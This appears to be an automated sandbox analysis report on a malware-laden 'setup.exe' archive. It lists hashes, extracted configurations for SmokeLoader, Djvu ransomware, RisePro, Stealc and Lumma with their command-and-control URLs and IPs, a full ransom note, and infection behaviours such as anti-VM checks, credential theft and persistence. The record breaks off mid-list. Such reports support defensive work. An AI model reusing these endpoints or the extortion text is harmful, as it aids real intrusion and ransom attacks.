Overview
overview
10Static
static
3release_v4.rar
windows7-x64
3release_v4.rar
windows10-2004-x64
7ICQLiteShell.dll
windows7-x64
1ICQLiteShell.dll
windows10-2004-x64
1ICQRT.dll
windows7-x64
3ICQRT.dll
windows10-2004-x64
3Resource/S...di.spp
windows7-x64
3Resource/S...di.spp
windows10-2004-x64
3Resource/T...50.txt
windows7-x64
1Resource/T...50.txt
windows10-2004-x64
1Resource/T...51.txt
windows7-x64
1Resource/T...51.txt
windows10-2004-x64
1Resource/T...52.txt
windows7-x64
1Resource/T...52.txt
windows10-2004-x64
1Resource/T...53.txt
windows7-x64
1Resource/T...53.txt
windows10-2004-x64
1Resource/T...54.txt
windows7-x64
1Resource/T...54.txt
windows10-2004-x64
1Resource/T...57.txt
windows7-x64
1Resource/T...57.txt
windows10-2004-x64
1Resource/T...58.txt
windows7-x64
1Resource/T...58.txt
windows10-2004-x64
1Resource/r...es.pak
windows7-x64
3Resource/r...es.pak
windows10-2004-x64
3bentonite.png
windows7-x64
3bentonite.png
windows10-2004-x64
3setup.exe
windows7-x64
10setup.exe
windows10-2004-x64
10Analysis
-
max time kernel
100s -
max time network
169s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system -
submitted
23-02-2024 11:52
Static task
static1
Behavioral task
behavioral1
Sample
release_v4.rar
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
release_v4.rar
Resource
win10v2004-20240221-en
Behavioral task
behavioral3
Sample
ICQLiteShell.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
ICQLiteShell.dll
Resource
win10v2004-20240221-en
Behavioral task
behavioral5
Sample
ICQRT.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
ICQRT.dll
Resource
win10v2004-20240221-en
Behavioral task
behavioral7
Sample
Resource/SaslPrep/SaslPrepProfile_norm_bidi.spp
Resource
win7-20240220-en
Behavioral task
behavioral8
Sample
Resource/SaslPrep/SaslPrepProfile_norm_bidi.spp
Resource
win10v2004-20240221-en
Behavioral task
behavioral9
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1250.txt
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1250.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral11
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1251.txt
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1251.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral13
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1252.txt
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1252.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral15
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1253.txt
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1253.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral17
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1254.txt
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1254.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral19
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1257.txt
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1257.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral21
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1258.txt
Resource
win7-20240220-en
Behavioral task
behavioral22
Sample
Resource/TypeSupport/Unicode/Mappings/win/CP1258.txt
Resource
win10v2004-20240221-en
Behavioral task
behavioral23
Sample
Resource/resources.pak
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
Resource/resources.pak
Resource
win10v2004-20240221-en
Behavioral task
behavioral25
Sample
bentonite.png
Resource
win7-20240215-en
Behavioral task
behavioral26
Sample
bentonite.png
Resource
win10v2004-20240221-en
Behavioral task
behavioral27
Sample
setup.exe
Resource
win7-20240221-en
General
-
Target
setup.exe
-
Size
738.0MB
-
MD5
d6cf8913bbfdbb9900164fb6e057dda7
-
SHA1
97baef4de047edc648e4a4222db576079080cd66
-
SHA256
5daa33a756141dac301dc364c1fc538e91cb66a4878719d3a645fd108c6dfa72
-
SHA512
ff42356169b867e88120b9a2b2dff39282d07beaf8302dd79681ddf414e93ae21ef5030a2af836e0b208b811582ae43507d197d13485135e83cb212708ca8daf
-
SSDEEP
98304:C/J4w8+uMZh2F0pwIg7ogcSVn1TDifyDJdbgWETcWG/AbO0e+4:C/uXEhQ0pwIhgcSDGWnWte+4
Malware Config
Extracted
smokeloader
pub3
Extracted
djvu
http://habrafa.com/test2/get.php
-
extension
.lkfr
-
offline_id
OxV6DGl22io8sqMOW1zCCOlzPiv4f1Vqzw7Y8zt1
- payload_url
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-uNdL2KHHdy Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0852ASdw
Extracted
smokeloader
2022
http://sjyey.com/tmp/index.php
http://babonwo.ru/tmp/index.php
http://mth.com.ua/tmp/index.php
http://piratia.pw/tmp/index.php
http://go-piratia.ru/tmp/index.php
Extracted
risepro
193.233.132.67:50500
37.120.237.196:50500
193.233.132.62
Extracted
stealc
http://185.172.128.24
-
url_path
/f993692117a3fda2.php
Extracted
lumma
https://turkeyunlikelyofw.shop/api
https://associationokeo.shop/api
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe family_zgrat_v1 C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe family_zgrat_v1 behavioral28/memory/6052-737-0x0000000000880000-0x0000000000ECA000-memory.dmp family_zgrat_v1 C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe family_zgrat_v1 -
Detected Djvu ransomware 5 IoCs
Processes:
resource yara_rule behavioral28/memory/748-741-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral28/memory/5984-755-0x00000000022F0000-0x000000000240B000-memory.dmp family_djvu behavioral28/memory/748-754-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral28/memory/748-736-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral28/memory/748-959-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 1 IoCs
Processes:
resource yara_rule behavioral28/memory/5616-953-0x00000000051F0000-0x0000000005ADB000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
setup.exeS7BJFj0JPGuOIK5ke2EiWzRe.exeNnROE5b4OASR13ERwrphVqIv.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ S7BJFj0JPGuOIK5ke2EiWzRe.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NnROE5b4OASR13ERwrphVqIv.exe -
Blocklisted process makes network request 8 IoCs
Processes:
schtasks.exeflow pid process 214 2424 schtasks.exe 215 2424 schtasks.exe 217 2424 schtasks.exe 218 2424 schtasks.exe 219 2424 schtasks.exe 221 2424 schtasks.exe 227 2424 schtasks.exe 228 2424 schtasks.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 5832 netsh.exe 1708 netsh.exe -
Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
S7BJFj0JPGuOIK5ke2EiWzRe.exeNnROE5b4OASR13ERwrphVqIv.exeInstall.exesetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion S7BJFj0JPGuOIK5ke2EiWzRe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion S7BJFj0JPGuOIK5ke2EiWzRe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NnROE5b4OASR13ERwrphVqIv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NnROE5b4OASR13ERwrphVqIv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setup.exef0_8GJMbJWHKd0bn8qAoSGuv.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation f0_8GJMbJWHKd0bn8qAoSGuv.exe Key value queried \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 2 IoCs
Processes:
w6rxdZKVGKZ4S99sMhSfXG4z.exeMsBuild.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk w6rxdZKVGKZ4S99sMhSfXG4z.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe MsBuild.exe -
Executes dropped EXE 28 IoCs
Processes:
zVlqImu7G3G4sPmxLZrutQJQ.exeS7BJFj0JPGuOIK5ke2EiWzRe.exeevl5AhAqx92wdfRi532WmaQN.exee1lkxrydipIJfmBIkHJEKZuB.exeQaQDZ75Ud6n9EKcYI2SHfJNs.exeVITLpmgdrZSEsfnjjCSHaEDR.exeK0NNvWiVJgVgRj4wsXiZz39s.exevGrIU7ib1YOS2PYSmzDAoF5v.exeLghhhG5dYtl5hoIKD95UlVUg.exef0_8GJMbJWHKd0bn8qAoSGuv.exeAKDaZLMxwKvUY2U0BxfH0RwL.exeLCpil3pW_l7ri4gXpRd7f0AQ.exeevl5AhAqx92wdfRi532WmaQN.tmpNnROE5b4OASR13ERwrphVqIv.exeSBv9uOfXRyyWp_0lKyUFY2zJ.exew6rxdZKVGKZ4S99sMhSfXG4z.exejfuVd2Wxxnz6tzydAf9H8i_Y.exef0_8GJMbJWHKd0bn8qAoSGuv.exeschtasks.exeInstall.exeinfotoolext.exeinfotoolext.exeInstall.exef0_8GJMbJWHKd0bn8qAoSGuv.exef0_8GJMbJWHKd0bn8qAoSGuv.exeqemu-ga.exeVITLpmgdrZSEsfnjjCSHaEDR.exeQaQDZ75Ud6n9EKcYI2SHfJNs.exepid process 956 zVlqImu7G3G4sPmxLZrutQJQ.exe 5276 S7BJFj0JPGuOIK5ke2EiWzRe.exe 5288 evl5AhAqx92wdfRi532WmaQN.exe 5260 e1lkxrydipIJfmBIkHJEKZuB.exe 5616 QaQDZ75Ud6n9EKcYI2SHfJNs.exe 5624 VITLpmgdrZSEsfnjjCSHaEDR.exe 5640 K0NNvWiVJgVgRj4wsXiZz39s.exe 5648 vGrIU7ib1YOS2PYSmzDAoF5v.exe 5992 LghhhG5dYtl5hoIKD95UlVUg.exe 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe 6052 AKDaZLMxwKvUY2U0BxfH0RwL.exe 6000 LCpil3pW_l7ri4gXpRd7f0AQ.exe 6044 evl5AhAqx92wdfRi532WmaQN.tmp 1732 NnROE5b4OASR13ERwrphVqIv.exe 2932 SBv9uOfXRyyWp_0lKyUFY2zJ.exe 1312 w6rxdZKVGKZ4S99sMhSfXG4z.exe 1740 jfuVd2Wxxnz6tzydAf9H8i_Y.exe 748 f0_8GJMbJWHKd0bn8qAoSGuv.exe 2424 schtasks.exe 916 Install.exe 1564 infotoolext.exe 4092 infotoolext.exe 3080 Install.exe 5020 f0_8GJMbJWHKd0bn8qAoSGuv.exe 5204 f0_8GJMbJWHKd0bn8qAoSGuv.exe 5968 qemu-ga.exe 3036 VITLpmgdrZSEsfnjjCSHaEDR.exe 6076 QaQDZ75Ud6n9EKcYI2SHfJNs.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
S7BJFj0JPGuOIK5ke2EiWzRe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Software\Wine S7BJFj0JPGuOIK5ke2EiWzRe.exe -
Loads dropped DLL 6 IoCs
Processes:
evl5AhAqx92wdfRi532WmaQN.tmpzVlqImu7G3G4sPmxLZrutQJQ.exeAKDaZLMxwKvUY2U0BxfH0RwL.exepid process 6044 evl5AhAqx92wdfRi532WmaQN.tmp 6044 evl5AhAqx92wdfRi532WmaQN.tmp 6044 evl5AhAqx92wdfRi532WmaQN.tmp 956 zVlqImu7G3G4sPmxLZrutQJQ.exe 956 zVlqImu7G3G4sPmxLZrutQJQ.exe 6052 AKDaZLMxwKvUY2U0BxfH0RwL.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe themida C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe themida behavioral28/memory/1732-839-0x0000000000920000-0x0000000000F32000-memory.dmp themida behavioral28/memory/1732-841-0x0000000000920000-0x0000000000F32000-memory.dmp themida behavioral28/memory/1732-843-0x0000000000920000-0x0000000000F32000-memory.dmp themida behavioral28/memory/1732-845-0x0000000000920000-0x0000000000F32000-memory.dmp themida behavioral28/memory/1732-846-0x0000000000920000-0x0000000000F32000-memory.dmp themida behavioral28/memory/1732-878-0x0000000000920000-0x0000000000F32000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
w6rxdZKVGKZ4S99sMhSfXG4z.exef0_8GJMbJWHKd0bn8qAoSGuv.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" w6rxdZKVGKZ4S99sMhSfXG4z.exe Set value (str) \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\60fd73a9-b566-4ebe-bf13-7efa1ba8c839\\f0_8GJMbJWHKd0bn8qAoSGuv.exe\" --AutoStart" f0_8GJMbJWHKd0bn8qAoSGuv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
setup.exeNnROE5b4OASR13ERwrphVqIv.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NnROE5b4OASR13ERwrphVqIv.exe -
Drops Chrome extension 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json schtasks.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 216 ipinfo.io 32 api.myip.com 33 api.myip.com 34 ipinfo.io 180 api.2ip.ua 35 ipinfo.io 179 api.2ip.ua 215 api.myip.com 217 ipinfo.io -
Drops file in System32 directory 9 IoCs
Processes:
setup.exeschtasks.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification C:\Windows\System32\GroupPolicy schtasks.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini schtasks.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol schtasks.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI schtasks.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
setup.exeS7BJFj0JPGuOIK5ke2EiWzRe.exeNnROE5b4OASR13ERwrphVqIv.exepid process 4996 setup.exe 5276 S7BJFj0JPGuOIK5ke2EiWzRe.exe 1732 NnROE5b4OASR13ERwrphVqIv.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
f0_8GJMbJWHKd0bn8qAoSGuv.exeSBv9uOfXRyyWp_0lKyUFY2zJ.exef0_8GJMbJWHKd0bn8qAoSGuv.exeAKDaZLMxwKvUY2U0BxfH0RwL.exedescription pid process target process PID 5984 set thread context of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 2932 set thread context of 5168 2932 SBv9uOfXRyyWp_0lKyUFY2zJ.exe RegAsm.exe PID 5020 set thread context of 5204 5020 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 6052 set thread context of 2780 6052 AKDaZLMxwKvUY2U0BxfH0RwL.exe MsBuild.exe -
Drops file in Program Files directory 2 IoCs
Processes:
chrome.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log chrome.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5688 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process 4972 5260 WerFault.exe 1136 5204 WerFault.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe 224 1740 WerFault.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe 5608 956 WerFault.exe zVlqImu7G3G4sPmxLZrutQJQ.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
K0NNvWiVJgVgRj4wsXiZz39s.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI K0NNvWiVJgVgRj4wsXiZz39s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI K0NNvWiVJgVgRj4wsXiZz39s.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI K0NNvWiVJgVgRj4wsXiZz39s.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
zVlqImu7G3G4sPmxLZrutQJQ.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 zVlqImu7G3G4sPmxLZrutQJQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString zVlqImu7G3G4sPmxLZrutQJQ.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4836 schtasks.exe 2808 schtasks.exe 1460 schtasks.exe 3780 schtasks.exe 2456 schtasks.exe 5164 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
chrome.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
VITLpmgdrZSEsfnjjCSHaEDR.exepowershell.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) 